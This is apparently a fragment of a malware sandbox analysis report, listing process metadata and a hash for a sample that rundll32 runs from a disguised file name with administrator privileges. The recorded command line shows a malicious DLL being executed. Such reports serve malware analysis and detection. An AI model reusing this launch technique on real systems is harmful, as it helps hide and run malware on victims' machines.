                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:17:40
                                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                                                                                                                          Imagebase:0x3e0000
                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          Disassembly

                                                                                                                                                                          Code Analysis

                                                                                                                                                                          Reset < >